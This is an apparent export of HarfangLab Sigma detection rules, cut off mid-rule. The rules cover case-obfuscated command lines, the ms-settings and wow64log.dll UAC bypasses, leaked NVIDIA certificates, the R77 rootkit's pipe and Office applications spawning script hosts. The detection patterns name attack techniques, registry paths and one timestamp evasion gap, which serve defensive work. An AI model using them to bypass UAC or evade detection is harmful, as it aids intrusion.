"content": "title: Suspicious Obfuscated Command-line using Uppercase and Lowercase Characters\nid: 8f0ba3e3-bdb8-4dfa-bdab-69e77fd82f98\ndescription: |\n Detects the possible obfuscation of a process command-line using alternating lower and uppercase letters.\n Attackers often try to evade defenses by changing the case of letters composing their command-line, supposing that security solutions use case senstive patterns.\n It is recommended to analyze the detected process and look for malicious behavior or content.\nreferences:\n - https://www.logpoint.com/en/blog/emerging-threats/hiding-in-plain-sight-the-subtle-art-of-loki-malwares-obfuscation/\n - https://attack.mitre.org/techniques/T1027/010/\ndate: 2024/01/12\nmodified: 2025/07/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1027.010\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Obfuscation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # Case insensitive filter\n selection_powershell:\n OriginalFileName: 'powershell.exe'\n CommandLine|contains: 'powershell'\n # Filter out known occurences\n filter_powershell:\n CommandLine|re:\n - 'PowerShell'\n - 'powershell'\n - 'Powershell'\n - 'powerShell'\n - 'POWERSHELL'\n\n selection_encodedcommand:\n OriginalFileName: 'powershell.exe'\n CommandLine|contains: '-encodedcommand'\n filter_encodedcommand:\n CommandLine|re:\n - '-EncodedCommand'\n - '-encodedCommand'\n - '-encodedcommand'\n\n selection_cmd:\n OriginalFileName: 'cmd.exe'\n CommandLine|contains: 'cmd.exe'\n filter_cmd:\n CommandLine|re:\n - 'Cmd\\.exe'\n - 'Cmd\\.EXE'\n - 'cmd\\.EXE'\n - 'cmd\\.exe'\n - 'cmd\\.Exe'\n - 'CMD\\.EXE'\n - 'CMD\\.exe'\n - 'Cmd\\.Exe'\n\n selection_wscript:\n OriginalFileName: 'wscript.exe'\n CommandLine|contains: 'wscript'\n filter_wscript:\n CommandLine|re:\n - 'WScript'\n - 'Wscript'\n - 'wscript'\n - 'WSCRIPT'\n\n selection_ping:\n # cmd /c 
XXX && ping XXX\n OriginalFileName: 'cmd.exe'\n CommandLine|contains: 'ping '\n filter_ping:\n CommandLine|re:\n - 'ping '\n - 'PING '\n - 'Ping '\n\n selection_rundll32:\n # cmd /c XXX && RuNDll32 XXX\n OriginalFileName: 'cmd.exe'\n CommandLine|contains: 'rundll32'\n filter_rundll32:\n CommandLine|re:\n - 'RUNDLL32'\n - 'rundll32'\n - 'RunDll32'\n - 'RunDLL32'\n - 'runDLL32'\n - 'Rundll32'\n\n selection_echo:\n # cmd /c XXX && echo XXX\n OriginalFileName: 'cmd.exe'\n CommandLine|contains: 'echo '\n filter_echo:\n CommandLine|re:\n - 'echo'\n - 'ECHO'\n - 'Echo'\n\n condition: (selection_powershell and not filter_powershell) or\n (selection_encodedcommand and not filter_encodedcommand) or\n (selection_cmd and not filter_cmd) or\n (selection_wscript and not filter_wscript) or\n (selection_ping and not filter_ping) or\n (selection_rundll32 and not filter_rundll32) or\n (selection_echo and not filter_echo)\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f0ba3e3-bdb8-4dfa-bdab-69e77fd82f98",
"rule_name": "Suspicious Obfuscated Command-line using Uppercase and Lowercase Characters",
"rule_description": "Detects the possible obfuscation of a process command-line using mixed lower- and uppercase letters.\nAttackers often try to evade defenses by changing the case of letters composing their command-line, assuming that security solutions use case-sensitive patterns.\nIt is recommended to analyze the detected process and look for malicious behavior or content.\n",
"rule_creation_date": "2024-01-12",
"rule_modified_date": "2025-07-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1027.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f127aec-f4a0-4c97-b4be-a82c64718b3b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092401Z",
"creation_date": "2026-03-23T11:45:34.092403Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092408Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_prepare_uac_bypass_ms_settings_user_command.yml",
"content": "title: Ms-settings UAC Bypass Prepared\nid: 8f127aec-f4a0-4c97-b4be-a82c64718b3b\ndescription: |\n Detects the preparation of the ms-settings UAC bypass, involving the setting of multiple registry keys.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\nreferences:\n - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/10\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - attack.t1546.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set_value:\n EventType: 'SetValue'\n TargetObject:\n - 'HKU\\\\*\\ms-settings\\shell\\open\\command\\(Default)'\n - 'HKU\\\\*\\ms-settings\\\\*SymbolicLinkValue'\n - 'HKU\\\\*\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\ms-settings\\UserChoice\\ProgId'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n selection_rename:\n EventType: 'RenameValue'\n NewName: 'HKU\\\\*_Classes\\ms-settings\\\\*'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: (selection_set_value and not filter_empty) or selection_rename and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f127aec-f4a0-4c97-b4be-a82c64718b3b",
"rule_name": "Ms-settings UAC Bypass Prepared",
"rule_description": "Detects the preparation of the ms-settings UAC bypass, involving the setting of registry values under the current user's ms-settings ProgID key (HKU), which auto-elevated binaries such as fodhelper.exe consult.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-10",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.001",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f2672a6-33bf-4bf6-a57e-c7b8960c8907",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078448Z",
"creation_date": "2026-03-23T11:45:34.078450Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078455Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.malwarebytes.com/awareness/2022/03/stolen-nvidia-certificates-used-to-sign-malware-heres-what-to-do/",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_nvidia_stolen_cert_process_execution.yml",
"content": "title: Process Executed Signed with NVIDIA Stolen Certificate\nid: 8f2672a6-33bf-4bf6-a57e-c7b8960c8907\ndescription: |\n Detects the execution of a process using one of NVIDIA's stolen certificates.\n This can be the sign of a malware using a fake signature to evade AV/EDR detection.\n It is recommended to investigate the binary to determine its legitimacy, for instance by determining whether this file may be part of a legitimate but legacy NVIDIA component.œ\nreferences:\n - https://blog.malwarebytes.com/awareness/2022/03/stolen-nvidia-certificates-used-to-sign-malware-heres-what-to-do/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/07/12\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_cert_1:\n ProcessSignatureSignerThumbprint: '579aec4489a2ca8a2a09df5dc0323634bd8b16b7'\n\n selection_timestamp_filter_cert_1:\n ProcessPETimestampStr|startswith:\n - '2011-'\n - '2012-'\n - '2013-'\n - '2014-01'\n - '2014-02'\n - '2014-03'\n - '2014-04'\n - '2014-05'\n - '2014-06'\n - '2014-07'\n - '2014-08'\n\n selection_cert_2:\n ProcessSignatureSignerThumbprint: '30632ea310114105969d0bda28fdce267104754f'\n\n selection_timestamp_filter_cert_2:\n ProcessPETimestampStr|startswith:\n - '2015-07'\n - '2015-08'\n - '2015-09'\n - '2015-10'\n - '2015-11'\n - '2015-12'\n - '2016-'\n - '2017-'\n - '2018-01'\n - '2018-02'\n - '2018-03'\n - '2018-04'\n - '2018-05'\n - '2018-06'\n - '2018-07'\n\n filter_copyright:\n ProcessLegalCopyright|contains:\n - 'NVIDIA'\n - 'Galasoft'\n\n filter_path:\n Image:\n - '?:\\Windows\\System32\\nvwmi64.exe'\n # C:\\Program Files (x86)\\NVIDIA Corporation\\NvNode\\NVIDIA Web Helper.exe\n - '?:\\Program Files (x86)\\NVIDIA 
Corporation\\NvNode\\\\*'\n\n condition: ((selection_cert_1 and not selection_timestamp_filter_cert_1) or (selection_cert_2 and not selection_timestamp_filter_cert_2)) and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f2672a6-33bf-4bf6-a57e-c7b8960c8907",
"rule_name": "Process Executed Signed with NVIDIA Stolen Certificate",
"rule_description": "Detects the execution of a process signed with one of NVIDIA's stolen (leaked) code-signing certificates.\nThis can be the sign of malware carrying a cryptographically valid signature made with a leaked certificate in order to evade AV/EDR detection.\nIt is recommended to investigate the binary to determine its legitimacy, for instance by determining whether this file may be part of a legitimate but legacy NVIDIA component.\nNote that legacy builds are excluded based on the PE compile timestamp, a header field an attacker can set freely, so a forged timestamp within the legitimate range would evade this rule.\n",
"rule_creation_date": "2022-07-12",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f283fa9-b41e-4246-bfc9-b4489a85db7d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093640Z",
"creation_date": "2026-03-23T11:45:34.093642Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093646Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_wow64log.yml",
"content": "title: UAC Bypass Executed via wow64log.dll Hijacking\nid: 8f283fa9-b41e-4246-bfc9-b4489a85db7d\ndescription: |\n Detects the execution of the wow64log.dll UAC bypass, involving the hijacking of the DLL by a SysWoW64 application.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the creation of the DLL as well as the DLL itself look for malicious content or actions.\nreferences:\n - https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/11\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|startswith: '?:\\Windows\\SysWOW64\\'\n ImageLoaded: '?:\\Windows\\System32\\wow64log.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f283fa9-b41e-4246-bfc9-b4489a85db7d",
"rule_name": "UAC Bypass Executed via wow64log.dll Hijacking",
"rule_description": "Detects the execution of the wow64log.dll UAC bypass, in which a planted, non-Microsoft-signed wow64log.dll in System32 is loaded by a 32-bit (SysWOW64) application.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the creation of the DLL, as well as the DLL itself, to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-11",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f319367-4b99-4eab-be5b-1cd8295d577a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087888Z",
"creation_date": "2026-03-23T11:45:34.087890Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087894Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit",
"https://twitter.com/malmoeb/status/1523179260273254407",
"https://github.com/bytecode77/r77-rootkit",
"https://attack.mitre.org/techniques/T1014/"
],
"name": "t1014_r77_named_pipes_connected.yml",
"content": "title: Named Pipe Connected linked to R77 Rootkit\nid: 8f319367-4b99-4eab-be5b-1cd8295d577a\ndescription: |\n Detects connection to a Named Pipe pertaining to the R77 ring3 rootkit.\n R77 is an open source userland rootkit that is being used to hide the presence of other software on a system by hooking multiple Windows APIs.\n It is recommended to investigate the process that connected to the named pipe to determine its legitimacy.\nreferences:\n - https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit\n - https://twitter.com/malmoeb/status/1523179260273254407\n - https://github.com/bytecode77/r77-rootkit\n - https://attack.mitre.org/techniques/T1014/\ndate: 2022/07/18\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1014\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Rootkit.R77\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: named_pipe_connection\n product: windows\ndetection:\n selection:\n PipeName: '\\$77control'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f319367-4b99-4eab-be5b-1cd8295d577a",
"rule_name": "Named Pipe Connected linked to R77 Rootkit",
"rule_description": "Detects connection to a Named Pipe pertaining to the R77 ring3 rootkit.\nR77 is an open source userland rootkit that is being used to hide the presence of other software on a system by hooking multiple Windows APIs.\nIt is recommended to investigate the process that connected to the named pipe to determine its legitimacy.\n",
"rule_creation_date": "2022-07-18",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1014",
"attack.t1106",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f4677ab-ed23-4357-929d-c15459d867f3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628319Z",
"creation_date": "2026-03-23T11:45:34.628321Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628325Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/",
"https://attack.mitre.org/techniques/T1203/"
],
"name": "t1104_office_application_spawning_malicious_processes.yml",
"content": "title: Dangerous Process Started by Microsoft Office Application\nid: 8f4677ab-ed23-4357-929d-c15459d867f3\ndescription: |\n Detects suspicious child processes spawned by Microsoft Office applications (Word, Excel, Powerpoint, Publisher, Visio, ...), which may indicate the execution of malicious code via phishing documents or macro abuse.\n This behavior is commonly observed in attacks leveraging weaponized Office files to download or execute additional payloads.\n It is recommended to investigate the command-line as well as to correlate this alert with other commands executed around it to determine its legitimacy.\nreferences:\n - https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\n - https://attack.mitre.org/techniques/T1203/\ndate: 2020/09/30\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.initial_access\n - attack.t1203\n - attack.t1204.002\n - attack.t1566\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_parent:\n ParentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\POWERPNT.EXE'\n - '\\VISIO.EXE'\n - '\\EQNEDT32.EXE' # related to CVE 2017-11882\n - '\\GRAPH.EXE'\n - '\\MSPUB.exe'\n - '\\WINPROJ.exe'\n - '\\WORDPAD.exe'\n\n selection_image:\n - Image|endswith:\n # cmd + scripts\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n # persistence\n - '\\schtasks.exe'\n - '\\regsvr32.exe' # lolbas squiblydoo\n - '\\wmic.exe' # use wmic to spawn PowerShell or else under wmiprvse or squiblytwo\n - '\\mshta.exe'\n - '\\rundll32.exe'\n - '\\msiexec.exe'\n - '\\msbuild.exe' # https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n - '\\AppVLP.exe' # lolbas : 
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\n # resource extraction\n - '\\extrac32.exe' # https://twitter.com/ShadowChasing1/status/1557287930267578368\n # handle renamed binaries\n - OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'cscript.exe'\n - 'wscript.exe'\n - 'schtasks.exe'\n - 'REGSVR32.EXE'\n - 'wmic.exe'\n - 'MSHTA.EXE'\n - 'RUNDLL32.EXE'\n - 'msiexec.exe'\n - 'MSBuild.exe'\n - 'appvlp.exe'\n - 'extrac32.exe'\n\n # This is handled by the rule 686d2296-eed8-4f0a-8e68-174ea45e8902\n filter_appdata:\n ParentCommandLine|contains: '\\AppData\\'\n\n exclusion_false_positives:\n CommandLine:\n # parent is outlook\n - '*\\rundll32.exe ?:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll, ImageView_Fullscreen *'\n - '*ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile*'\n - '*cryptext.dll,CryptExt*'\n - '*?:\\windows\\system32\\spool\\drivers\\\\*'\n - '*\\ZoneCentral\\zedmail.dll*' # '*c:\\program files\\Prim'X\\ZoneCentral\\zedmail.dll*'\n - '*\\ZoneCentral\\zedmail32.dll*' # '*c:\\program files\\Prim'X\\ZoneCentral\\zedmail32.dll*'\n - '*\\ZoneCentral\\zci.dll,*'\n - '*printui.dll,PrintUIEntry*'\n - '*shell32.dll,Control_RunDLL*srchadmin.dll*'\n # - '*c:\\windows\\system32\\mshtml.dll*' # mshtml only could permit dangerous stuff\n - '*dfshim.dll*ShOpenVerbApplication*'\n - '*\\rundll32.exe ?:\\Windows\\System32\\dfshim.dll,ShOpenVerbShortcut *'\n - '*shell32.dll,SHCreateLocalServerRunDll *{3eef301f-b596-4c0b-bd92-013beafce793}*' # Desktop Undo Manager\n # C:\\windows\\system32\\rundll32.exe C:\\windows\\syswow64\\WININET.dll,DispatchAPICall 1\n - '*\\windows\\syswow64\\WININET.dll,DispatchAPICall 1'\n - '*\\windows\\system32\\WININET.dll,DispatchAPICall 1'\n # C:\\WINDOWS\\system32\\MSIEXEC.EXE /X {AB966E92-1EB2-4BEB-81CA-6B319681B977} /QB\n - '*\\MSIEXEC.EXE /X {????????-????-????-????-????????????} /QB'\n # \"C:\\WINDOWS\\system32\\MSIEXEC.EXE\" /X {7EE8ACD7-531C-4E3E-A481-E2D468CB6DDD} /QB\n - '*\\MSIEXEC.EXE? 
/X {????????-????-????-????-????????????} /QB'\n - '*\\rundll32.exe ?:\\Windows\\system32\\shell32.dll,OpenAs_RunDLL *'\n - '*\\rundll32.exe shwebsvc.dll,AddNetPlaceRunDll'\n - '*\\rundll32.exe ?:\\Windows\\system32\\url.dll,MailToProtocolHandler mailto:*'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-TimeZone|clip'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-TimeZone|clip'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-Culture|clip'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -command Get-Culture|clip'\n - 'cmd /c type *.txt | clip'\n - '?:\\Windows\\System32\\cmd.exe /c schtasks /delete /tn Kutools Scheduler Send /F' # https://appsource.microsoft.com/fr-fr/product/office/wa200007808?tab=overview\n - '?:\\Windows\\system32\\msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Temp\\tmp????.tmp'\n - '?:\\Windows\\System32\\msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Temp\\CalDavSynchronizer\\\\*\\CalDavSynchronizer.Setup.msi /passive'\n - 'cmd.exe /C taskkill/PID * /F && msiexec /norestart /uninstall {????????-????-????-????-????????????} /qr && msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Temp\\WordExpertSetup.msi TARGETDIR=?:\\APPS\\Regnology\\Word Expert? 
&& start winword.exe'\n - 'cscript ?:\\Program Files\\Microsoft Office\\Office??\\ospp.vbs /dstatus'\n - '?:\\Windows\\System32\\cscript.exe ?:\\Program Files\\Microsoft Office\\root\\Office??\\ospp.vbs /dstatus'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\dsquery.dll,OpenSavedDsQuery *.qds'\n - '?:\\Windows\\System32\\rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3'\n - '?:\\WINDOWS\\system32\\cmd.exe /c \\\\\\\\*'\n - '?:\\windows\\System32\\WScript.exe \\\\\\\\*'\n - '?:\\Windows\\System32\\cmd.exe /C pause'\n - '?:\\WINDOWS\\system32\\cmd.exe /c D:\\\\*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c E:\\\\*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c F:\\\\*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c G:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c L:\\\\*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c Q:\\\\*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c X:\\\\*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c Z:\\\\*'\n - 'rundll32.exe ?:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll,InstallVstoSolution *.vsto'\n - 'cmd /c ftp -i -s:?:\\\\*\\FtpFicintrop.cfg > ?:\\\\*\\Debug.log'\n - 'cmd /c start *.pdf'\n - 'cmd /c start *.html'\n - 'cmd /c start *.jsp'\n - 'cmd /c start *.jpg'\n - '?:\\Windows\\System32\\cmd.exe /c start *.pdf'\n - '?:\\Windows\\System32\\cmd.exe /c start *.html'\n - '?:\\Windows\\System32\\cmd.exe /c start *.jsp'\n - '?:\\Windows\\System32\\cmd.exe /c start *.jpg'\n - '?:\\Windows\\SysWOW64\\cmd.exe /c start *.pdf'\n - '?:\\Windows\\SysWOW64\\cmd.exe /c start *.html'\n - '?:\\Windows\\SysWOW64\\cmd.exe /c start *.jsp'\n - '?:\\Windows\\SysWOW64\\cmd.exe /c start *.jpg'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\shimgvw.dll,imageview_fullscreen *.jpg'\n\n exclusion_qgis:\n CommandLine:\n - '?:\\windows\\system32\\cmd.exe /c ?:\\PROGRA*\\QGIS*\\\\*'\n - 'CMD /C SET GDAL_DATA=?:\\Program Files\\QGIS*\\\\*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\QGIS*\\bin\\\\*'\n\n exclusion_printer:\n 
